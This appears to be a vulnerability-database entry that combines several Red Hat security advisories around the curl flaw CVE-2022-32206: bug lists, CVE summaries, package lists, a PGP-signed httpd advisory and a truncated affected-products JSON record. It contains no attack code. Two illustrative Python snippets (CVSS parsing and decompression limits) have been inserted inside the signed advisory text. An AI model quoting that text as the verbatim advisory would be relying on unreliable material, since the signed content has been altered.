2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod
2134672 - [e2e] add data-test-id for catalog -> storage section
2134825 - Authorization for expand-spec endpoint missing
2135805 - Windows 2022 template is missing vTPM and UEFI params in spec
2136051 - Name jumping when trying to create a VM with source from catalog
2136425 - Windows 11 is detected as Windows 10
2136534 - Not possible to specify a TTL on VMExports
2137123 - VMExport: export pod is not PSA compliant
2137241 - Checkbox about delete vm disks is not loaded while deleting VM
2137243 - registry input adds docker prefix twice
2137349 - "Manage source" action infinitely loading on DataImportCron details page
2137591 - Inconsistent dialog headings/titles
2137731 - Link of VM status in overview is not working
2137733 - No link for VMs in error status in "VirtualMachine statuses" card
2137736 - The column name "MigrationPolicy name" can just be "Name"
2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly
2138112 - Unsupported S3 endpoint option in Add disk modal
2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals
2138199 - Win11 and Win22 templates are not filtered properly by Template provider
2138653 - Saving Template parameters reloads the page
2138657 - Setting DATA_SOURCE_ Template parameters makes VM creation fail
2138664 - VM that was created with SSH key fails to start
2139257 - Cannot add disk via "Using an existing PVC"
2139260 - Clone button is disabled while VM is running
2139293 - Non-admin user cannot load VM list page
2139296 - Non-admin cannot load MigrationPolicies page
2139299 - No auto-generated VM name while creating VM by non-admin user
2139306 - Non-admin cannot create VM via customize mode
2139479 - virtualization overview crashes for non-priv user
2139574 - VM name gets "emptyname" if the create button is clicked quickly
2139651 - non-priv user can click create when have no permissions
2139687 - catalog shows template list for non-priv users
2139738 - [4.12]Can't restore cloned VM
2139820 - non-priv user can't reach vm details
2140117 - Provide upgrade path from 4.11.1->4.12.0
2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project
2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user
2140627 - Not able to select storageClass if there is no default storageclass defined
2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user
2140808 - Hyperv feature set to "enabled: false" prevents scheduling
2140977 - Alerts number is not correct on Virtualization overview
2140982 - The base template of cloned template is "Not available"
2140998 - Incorrect information shows in overview page per namespace
2141089 - Unable to upload boot images.
2141302 - Unhealthy states alerts and state metrics are missing
2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations
2141494 - "Start in pause mode" option is not available while creating the VM
2141654 - warning log appearing on VMs: found no SR-IOV networks
2141711 - Node column selector is redundant for non-priv user
2142468 - VM action "Stop" should not be disabled when VM in pause state
2142470 - Delete a VM or template from all projects leads to 404 error
2142511 - Enhance alerts card in overview
2142647 - Error after MigrationPolicy deletion
2142891 - VM latency checkup: Failed to create the checkup's Job
2142929 - Permission denied when trying to get instancetypes
2143268 - Topolvm storageProfile missing accessModes and volumeMode
2143498 - Could not load template while creating VM from catalog
2143964 - Could not load template while creating VM from catalog
2144580 - "?" icon is too big in VM Template Disk tab
2144828 - "?" icon is too big in VM Template Disk tab
2144839 - Alerts number is not correct on Virtualization overview
2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten
2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container
- Description:
Multicluster Engine for Kubernetes 2.0.2 images
Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds.
You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy.
Security updates:
- moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
- vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fix:
- MCE 2.0.2 images (BZ# 2104569)
- Solution:
For multicluster engine for Kubernetes, see the following documentation for details on how to install the images:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online
- Bugs fixed (https://bugzilla.redhat.com/):
2104569 - MCE 2.0.2 Images
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
Bug Fix(es):
- Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api (BZ#2033191)
- Restart of VM Pod causes SSH keys to be regenerated within VM (BZ#2087177)
- Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR (BZ#2089391)
- [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass (BZ#2098225)
- Fedora version in DataImportCrons is not 'latest' (BZ#2102694)
- [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted (BZ#2109407)
- CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls (BZ#2110562)
- Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based (BZ#2112643)
- Unable to start windows VMs on PSI setups (BZ#2115371)
- [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 (BZ#2128997)
- Mark Windows 11 as TechPreview (BZ#2129013)
- 4.11.1 rpms (BZ#2139453)
This advisory contains the following OpenShift Virtualization 4.11.1 images.
RHEL-8-CNV-4.11
virt-cdi-operator-container-v4.11.1-5
virt-cdi-uploadserver-container-v4.11.1-5
virt-cdi-apiserver-container-v4.11.1-5
virt-cdi-importer-container-v4.11.1-5
virt-cdi-controller-container-v4.11.1-5
virt-cdi-cloner-container-v4.11.1-5
virt-cdi-uploadproxy-container-v4.11.1-5
checkup-framework-container-v4.11.1-3
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7
kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7
kubevirt-template-validator-container-v4.11.1-4
virt-handler-container-v4.11.1-5
hostpath-provisioner-operator-container-v4.11.1-4
virt-api-container-v4.11.1-5
vm-network-latency-checkup-container-v4.11.1-3
cluster-network-addons-operator-container-v4.11.1-5
virtio-win-container-v4.11.1-4
virt-launcher-container-v4.11.1-5
ovs-cni-marker-container-v4.11.1-5
hyperconverged-cluster-webhook-container-v4.11.1-7
virt-controller-container-v4.11.1-5
virt-artifacts-server-container-v4.11.1-5
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7
libguestfs-tools-container-v4.11.1-5
hostpath-provisioner-container-v4.11.1-4
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7
kubevirt-tekton-tasks-copy-template-container-v4.11.1-7
cnv-containernetworking-plugins-container-v4.11.1-5
bridge-marker-container-v4.11.1-5
virt-operator-container-v4.11.1-5
hostpath-csi-driver-container-v4.11.1-4
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7
kubemacpool-container-v4.11.1-5
hyperconverged-cluster-operator-container-v4.11.1-7
kubevirt-ssp-operator-container-v4.11.1-4
ovs-cni-plugin-container-v4.11.1-5
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7
kubevirt-tekton-tasks-operator-container-v4.11.1-2
cnv-must-gather-container-v4.11.1-8
kubevirt-console-plugin-container-v4.11.1-9
hco-bundle-registry-container-v4.11.1-49
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis:          Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update
Advisory ID:       RHSA-2022:8840-01
Product:           Red Hat JBoss Core Services
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8840
Issue date:        2022-12-08
CVE Names:         CVE-2022-1292 CVE-2022-2068 CVE-2022-22721 CVE-2022-23943 CVE-2022-26377 CVE-2022-28330 CVE-2022-28614 CVE-2022-28615 CVE-2022-30522 CVE-2022-31813 CVE-2022-32206 CVE-2022-32207 CVE-2022-32208 CVE-2022-32221 CVE-2022-35252 CVE-2022-42915 CVE-2022-42916
====================================================================
1. Summary:
An update is now available for Red Hat JBoss Core Services.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
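The CVSS vector strings referenced by these advisories (for example, NVD's CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H for CVE-2022-32206, base score 6.5) encode each severity metric as a short code. A minimal illustrative sketch of splitting such a vector into its metrics; `parse_cvss_vector` is a hypothetical helper, not part of any Red Hat or NVD tooling:

```python
def parse_cvss_vector(vector: str) -> dict:
    """Split a CVSS v3.x vector string into a {metric: value} dict.

    Hypothetical helper for reading vectors like the ones published
    with these advisories; it does not compute the base score.
    """
    prefix, _, metrics = vector.partition("/")
    if not prefix.startswith("CVSS:"):
        raise ValueError(f"not a CVSS vector: {vector!r}")
    return dict(m.split(":", 1) for m in metrics.split("/"))

# The vector NVD assigned to CVE-2022-32206 (MEDIUM, base score 6.5):
v = parse_cvss_vector("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H")
assert v == {"AV": "N", "AC": "L", "PR": "N", "UI": "R",
             "S": "U", "C": "N", "I": "N", "A": "H"}
```

Reading the metrics directly (network attack vector, no privileges, user interaction required, high availability impact) matches the denial-of-service character of the flaw.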
- Relevant releases/architectures:
Red Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64
Red Hat JBoss Core Services on RHEL 8 - noarch, x86_64
- Description:
Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.51, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
- curl: HSTS bypass via IDN (CVE-2022-42916)
- curl: HTTP proxy double-free (CVE-2022-42915)
- curl: POST following PUT confusion (CVE-2022-32221)
- httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
- httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
- httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
- httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
- httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
- curl: control code in cookie denial of service (CVE-2022-35252)
- jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
- curl: Unpreserved file permissions (CVE-2022-32207)
- curl: HTTP compression denial of service (CVE-2022-32206) and FTP-KRB bad message verification (CVE-2022-32208)
- openssl: the c_rehash script allows command injection (CVE-2022-2068)
- openssl: c_rehash script allows command injection (CVE-2022-1292)
- jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
- jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
Applications using the APR libraries, such as httpd, must be restarted for this update to take effect. After installing the updated packages, the httpd daemon will be restarted automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds
2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody
2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection
2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling
2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read
2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()
2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()
2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability
2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism
2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection
2099300 - CVE-2022-32206 curl: HTTP compression denial of service
2099305 - CVE-2022-32207 curl: Unpreserved file permissions
2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification
2120718 - CVE-2022-35252 curl: control code in cookie denial of service
2135411 - CVE-2022-32221 curl: POST following PUT confusion
2135413 - CVE-2022-42915 curl: HTTP proxy double-free
2135416 - CVE-2022-42916 curl: HSTS bypass via IDN
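CVE-2022-32206 above stems from curl accepting an unbounded chain of "chained" HTTP content decompressions, letting a tiny response expand into a "malloc bomb". The general mitigation idea is to cap both the number of chained decoding steps and the decoded size. A minimal sketch of that idea using Python's zlib; this is an illustration of the technique, not curl's actual patch (curl's fix caps the number of accepted encoding links internally), and the names and limits here are invented for the example:

```python
import zlib

MAX_LINKS = 5            # cap on chained decompression steps (illustrative value)
MAX_OUTPUT = 10 * 2**20  # cap on decoded bytes per step (10 MiB, illustrative)

def bounded_decompress(data: bytes, links: int) -> bytes:
    """Apply `links` chained zlib decompressions, enforcing hard caps.

    Rejects chains longer than MAX_LINKS up front, and aborts any step
    whose decoded output would exceed MAX_OUTPUT, so a malicious payload
    cannot force unbounded heap allocation.
    """
    if links > MAX_LINKS:
        raise ValueError(f"decompression chain too long: {links} > {MAX_LINKS}")
    out = data
    for _ in range(links):
        d = zlib.decompressobj()
        out = d.decompress(out, MAX_OUTPUT)  # max_length bounds this step
        if d.unconsumed_tail:                # stream decodes past the cap
            raise ValueError("decoded size exceeds MAX_OUTPUT")
    return out

# A payload compressed twice ("chained" encoding) decodes fine within limits:
payload = zlib.compress(zlib.compress(b"hello" * 100))
assert bounded_decompress(payload, links=2) == b"hello" * 100

# But a chain longer than MAX_LINKS is rejected before any allocation:
try:
    bounded_decompress(payload, links=50)
except ValueError as e:
    print("rejected:", e)
```

Checking the chain length before decoding anything is the key point: the cost of rejection stays constant no matter how adversarial the payload is.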
- Package List:
Red Hat JBoss Core Services on RHEL 7 Server:
Source:
jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.src.rpm
jbcs-httpd24-curl-7.86.0-2.el7jbcs.src.rpm
jbcs-httpd24-httpd-2.4.51-37.el7jbcs.src.rpm
jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.src.rpm
jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el7jbcs.src.rpm
jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.src.rpm
jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.src.rpm
jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.src.rpm
jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.src.rpm
jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.src.rpm
jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.src.rpm
jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el7jbcs.noarch.rpm
x86_64:
jbcs-httpd24-apr-util-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-devel-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-ldap-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-mysql-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-nss-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-odbc-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-openssl-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-pgsql-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-apr-util-sqlite-1.6.1-99.el7jbcs.x86_64.rpm
jbcs-httpd24-curl-7.86.0-2.el7jbcs.x86_64.rpm
jbcs-httpd24-curl-debuginfo-7.86.0-2.el7jbcs.x86_64.rpm
jbcs-httpd24-httpd-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-httpd-devel-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-httpd-selinux-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-httpd-tools-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-libcurl-7.86.0-2.el7jbcs.x86_64.rpm
jbcs-httpd24-libcurl-devel-7.86.0-2.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_http2-1.15.19-20.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_jk-debuginfo-1.2.48-44.redhat_1.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_ldap-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_md-2.4.0-18.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_html-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_security-2.9.3-22.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_session-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-mod_ssl-2.4.51-37.el7jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-1.43.0-11.el7jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el7jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-devel-1.43.0-11.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-1.1.1k-13.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-chil-1.0.0-17.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-devel-1.1.1k-13.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-libs-1.1.1k-13.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-perl-1.1.1k-13.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-pkcs11-0.4.10-32.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el7jbcs.x86_64.rpm
jbcs-httpd24-openssl-static-1.1.1k-13.el7jbcs.x86_64.rpm
Red Hat JBoss Core Services on RHEL 8:
Source:
jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.src.rpm
jbcs-httpd24-curl-7.86.0-2.el8jbcs.src.rpm
jbcs-httpd24-httpd-2.4.51-37.el8jbcs.src.rpm
jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.src.rpm
jbcs-httpd24-mod_jk-1.2.48-44.redhat_1.el8jbcs.src.rpm
jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.src.rpm
jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.src.rpm
jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.src.rpm
jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.src.rpm
jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.src.rpm
jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.src.rpm
jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.src.rpm
noarch: jbcs-httpd24-httpd-manual-2.4.51-37.el8jbcs.noarch.rpm
x86_64:
jbcs-httpd24-apr-util-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-devel-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-ldap-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-ldap-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-mysql-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-mysql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-nss-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-nss-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-odbc-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-odbc-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-openssl-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-openssl-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-pgsql-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-pgsql-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-sqlite-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-apr-util-sqlite-debuginfo-1.6.1-99.el8jbcs.x86_64.rpm
jbcs-httpd24-curl-7.86.0-2.el8jbcs.x86_64.rpm
jbcs-httpd24-curl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-devel-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-selinux-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-tools-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-httpd-tools-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-libcurl-7.86.0-2.el8jbcs.x86_64.rpm
jbcs-httpd24-libcurl-debuginfo-7.86.0-2.el8jbcs.x86_64.rpm
jbcs-httpd24-libcurl-devel-7.86.0-2.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_http2-1.15.19-20.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_http2-debuginfo-1.15.19-20.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_jk-ap24-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_jk-ap24-debuginfo-1.2.48-44.redhat_1.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_ldap-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_ldap-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_md-2.4.0-18.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_md-debuginfo-2.4.0-18.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_cluster-1.3.17-13.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_cluster-debuginfo-1.3.17-13.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_html-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_proxy_html-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_security-2.9.3-22.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_security-debuginfo-2.9.3-22.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_session-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_session-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_ssl-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-mod_ssl-debuginfo-2.4.51-37.el8jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-1.43.0-11.el8jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-debuginfo-1.43.0-11.el8jbcs.x86_64.rpm
jbcs-httpd24-nghttp2-devel-1.43.0-11.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-chil-1.0.0-17.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-chil-debuginfo-1.0.0-17.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-devel-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-libs-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-libs-debuginfo-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-perl-1.1.1k-13.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-pkcs11-0.4.10-32.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-pkcs11-debuginfo-0.4.10-32.el8jbcs.x86_64.rpm
jbcs-httpd24-openssl-static-1.1.1k-13.el8jbcs.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-1292
https://access.redhat.com/security/cve/CVE-2022-2068
https://access.redhat.com/security/cve/CVE-2022-22721
https://access.redhat.com/security/cve/CVE-2022-23943
https://access.redhat.com/security/cve/CVE-2022-26377
https://access.redhat.com/security/cve/CVE-2022-28330
https://access.redhat.com/security/cve/CVE-2022-28614
https://access.redhat.com/security/cve/CVE-2022-28615
https://access.redhat.com/security/cve/CVE-2022-30522
https://access.redhat.com/security/cve/CVE-2022-31813
https://access.redhat.com/security/cve/CVE-2022-32206
https://access.redhat.com/security/cve/CVE-2022-32207
https://access.redhat.com/security/cve/CVE-2022-32208
https://access.redhat.com/security/cve/CVE-2022-32221
https://access.redhat.com/security/cve/CVE-2022-35252
https://access.redhat.com/security/cve/CVE-2022-42915
https://access.redhat.com/security/cve/CVE-2022-42916
https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBY5ISE9zjgjWX9erEAQixuA//dX5Q3wtu2MRvrjD/sK/r6dqBz4fWWhS9
ws2A8cRa5ki3RlCaYQ3pP7LkRtIdankAP3HG1NU4er/odsMEW5aEgku+5foV7w4M
WEd0USLKs3Pw5a7/3TjOBUf5CA7oet03C7/u9idWaLD/ip4UMhskSnz33qFQSFZf
FAWNdsRhH8+ql6qFMg9Odv5RFX3i2+wBy5pC69Akr2FBEt9j+/PbvSPWuPD26n6H
0l+QUKrI3OW1EHzz+S/8aEfTFKLluXfhVJn61wdA8Kjs4ZKrnBz8czJjxn4hOi7a
z0tpzg5d1BJEf/UB7EdyyLBGRIliWhf978qtG8QS37GEgnQSof2xgcfu1NGiHl9j
ypCqX1R4oOkeoISynnZUKWZ1uFp5GkMiRtPu0Bw7WYB6z/8OWZce4yIqh1rcG09d
NcyleabDtpJ7C3BJQzpnhXAWjri7oJ6wHBvcbQ9sLj2xkQRX2Zpi0KJGIH8iLwdn
Ik+RIZ7u/mXeW3ulcwiQTPYbTQLWGXqgZV1qxJq91HIcu+y3STQwZjb4fZuqjH5M
onO/rF2y50l9LqArg/v9KAJUbHSKMDP6r7Dx02J+iKjW3g7NczoImrU7JcyAgce9
mCN7gMmU9bQx1tagIKcKKW5IVN/jHyWKJW/t0teoaECsa2LMgoEIt+6RcmQXWpdF
6t6oQh+b3NY=
=UGfz
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Bugs fixed (https://bugzilla.redhat.com/):
2099300 - CVE-2022-32206 curl: HTTP compression denial of service
2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "scalance sc646-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "scalance sc622-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
